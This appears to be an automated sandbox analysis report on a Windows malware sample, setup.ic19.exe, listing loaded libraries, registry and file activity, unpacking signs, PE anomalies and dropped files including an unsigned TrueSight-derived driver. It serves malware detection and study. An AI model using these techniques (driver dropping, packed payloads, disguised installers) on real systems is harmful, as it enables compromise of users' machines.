Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: hccutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: hccutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Section loaded: tbcore3u.dll

Source: C:\Users\user\Desktop\setup.ic19.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

File written: C:\Users\Public\Music\destopbak.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: setup.ic19.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: lXAMaI.exe, 00000007.00000000.2783978320.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe, 00000007.00000002.3502638996.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe, 00000007.00000002.3502823696.000000000065E000.00000004.00000020.00020000.00000000.sdmp, lXAMaI.exe, 00000008.00000002.2823804741.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe, 00000008.00000000.2808630341.0000000000438000.00000002.00000001.01000000.00000009.sdmp, 80c2T80R.exe, 00000009.00000002.2825983477.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, 80c2T80R.exe, 00000009.00000000.2812579803.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, 80c2T80R.exe, 0000000C.00000002.2874143335.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, 80c2T80R.exe, 0000000C.00000000.2862513779.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, lXAMaI.exe, 0000000D.00000002.2879628160.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe, 0000000D.00000000.2868833461.0000000000438000.00000002.00000001.01000000.00000009.sdmp, 80c2T80R.exe, 00000011.00000000.3452631941.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, 80c2T80R.exe, 00000011.00000002.3460559431.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, lXAMaI.exe, 00000012.00000000.3458920019.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe, 00000012.00000002.3476901708.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe.5.dr, 80c2T80R.exe.7.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: Atrebution.sys.0.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Unpacked PE file: 7.2.lXAMaI.exe.3600000.6.unpack

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

Code function: 4_2_004045D8 LoadLibraryA,GetProcAddress,FreeLibrary,SysFreeString,

4_2_004045D8

Source: initial sample

Static PE information: section where entry point is pointing to: .nsH

Source: tbcore3U.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x4a842f
Source: tbcore3U.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x4b176c
Source: setup.ic19.exe	Static PE information: real checksum: 0x61345 should be: 0x5d8d4
Source: hccutils.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x38010c

Source: hccutils.dll.0.dr	Static PE information: section name: _RDATA
Source: hccutils.dll.0.dr	Static PE information: section name: .C,D
Source: hccutils.dll.0.dr	Static PE information: section name: .N)b
Source: hccutils.dll.0.dr	Static PE information: section name: .nsH
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.5.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.7.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.7.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.7.dr	Static PE information: section name: .mo:

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_00432691 push ecx; ret	7_2_004326A4
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02EEC2AA push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02E842B8 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02EEC29F push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F8120D push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02E353C1 push ecx; ret	7_2_02E353D4
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02ED23BC push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02EB239D push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02EEC309 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02EAA0A0 pushfd ; retf	7_2_02EAA0D1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02E24021 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F181D7 push ss; iretd	7_2_02F18255
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02EC61C2 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02FF41AD push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F4817F push 0000007Ch; retf	7_2_03047A43
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02EFF135 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F056F6 pushfd ; retf	7_2_02EAA0D1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F7A6F9 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02EE2634 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02EE4780 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02FA076F push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_03051548 push BE348E0Ah; mov dword ptr [esp], ebx	7_2_0305154D
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F11404 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F92527 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_03011912 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02FEC854 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02E819D5 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F8E99A push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_0300F896 push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F8E94D push edi; iretd	7_2_02FABEA1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F8E947 push edi; iretd	7_2_02FABEA1

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\setup.ic19.exe

File created: C:\Users\user\AppData\Roaming\Atrebution.sys

Jump to behavior

Source: C:\Users\user\Desktop\setup.ic19.exe	File created: C:\Users\user\AppData\Roaming\Atrebution.sys	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File created: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Jump to dropped file
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	File created: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Jump to dropped file
Source: C:\Users\user\Desktop\setup.ic19.exe	File created: C:\Users\user\AppData\Roaming\8AfroU.exe	Jump to dropped file
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	File created: C:\Program Files (x86)\eL62Gl4\tbcore3U.dll	Jump to dropped file
